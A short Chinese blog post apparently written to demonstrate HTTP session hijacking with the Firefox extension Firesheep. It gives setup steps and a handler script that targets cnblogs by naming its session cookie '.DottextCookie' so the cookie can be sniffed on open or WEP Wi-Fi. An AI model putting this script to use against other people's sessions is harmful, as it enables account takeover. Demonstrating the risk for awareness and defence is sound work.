用 Firesheep 演示会话劫持

FireSheep 是两年前的一个 Firefox 扩展,用于演示 HTTP 的会话劫持。现在仍然有很多网站,比如 cnblogs 没使用 HTTPS 连接。因此这种方式仍然有效。

FireSheep 依赖 WinPcap,安装了 WinPcap 之后,安装 FireSheep 时发现,Firefox 版本太高无法使用。我们可以到 PortableApps 网站下载 3.6 版本的绿色版 Firefox。在 Firefox 3.6 中安装并打开 FireSheep,然后可以在选项添加一个 cnblogs 网站,在脚本处填上下面代码:

register({
  name: "cnblogs",
  domains: [ 'www.cnblogs.com' ],
  sessionCookieNames: [ '.DottextCookie' ],
  identifyUser: function () {
    var site = this.httpGet(this.siteUrl);
    this.userName = site.body.querySelector('a#lnkBlogUrl').innerHTML;
  }
});

就可以了。上面的 .DottextCookie 就是 cnblogs 网站用于识别用户会话的 cookie 项。FireSheep 将调用 WinPcap 抓取这个 cookie 值,从而达到会话劫持的目的。如果你使用的是无密码或者 WEP 密码的公共WIFI,则这种威胁是切实存在的。

实际上,我们可以使用 Wireshark 软件抓取到更详细的信息。

参考资料:
[1] Firesheep
[2] codebutler/firesheep
[3] Firesheep - Wikipedia, the free encyclopedia
[4] 利用Firesheep对人人网(renren.com)进行会话劫持
[5] 怎样应对会话劫持:以Firesheep为例

原文地址:https://www.cnblogs.com/zoho/p/2908233.html